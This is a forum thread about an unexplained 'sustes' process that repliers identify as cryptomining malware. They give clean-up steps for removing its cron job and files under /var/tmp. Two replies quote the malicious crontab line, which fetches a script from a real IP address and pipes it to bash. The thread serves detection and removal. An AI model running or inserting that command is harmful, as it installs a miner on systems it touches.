What is this "sustes" in my process in my CPU stats?

We’ve found a similar script/process. Turned out our test server had been compromised and its actually been mining crypto currency.

Check the crontab file for the following:

* * * * * wget -q -O - http://192.99.142.248:8220/mr.sh | bash -sh > /dev/null 2>&1

Edit: not sure if I should remove the IP address

Hello friend!

I’m afraid I have not heard of a process that identifies itself by that name, but that would generally be true of many applications that I have not personally used so it does not necessarily mean that anything is working other than in the intended way.

The short version of what this means is that software on your server is utilizing the CPU, and under an ideal scenario you would know what that software was in relation to how you set up the server and what that server’s role is.

Going a bit deeper, I would SSH in and run “top” and then press C to reveal more about the process, particularly under the Command column. You should be able to see in more detail where it is being ran from and what user on the system is running it. From there your path is a bit more of an unwritten story, as what you do next depends heavily on what you want to do and whether or not that is something that should be running on your system.

Kind Regards, Jarland

This is a cryptominer malware. You must delete it from your droplets. First delete this cron job. It runs under user, which called process “sustes”. You can find this username with “top” or in output of this comand: ps aux | grep sustes

Then look at cron job of this user: crontab -u username -l If it has this string

• • • • • wget -q -O - http://192.99.142.248:8220/mr.sh | bash -sh > /dev/null 2>&1

then edit this crobjob crontab -e -u username

or delete at all by crontab -r -u username

Then delete these files /var/tmp/sustes /var/tmp/sustes3 /var/tmp/wc.conf /var/tmp/123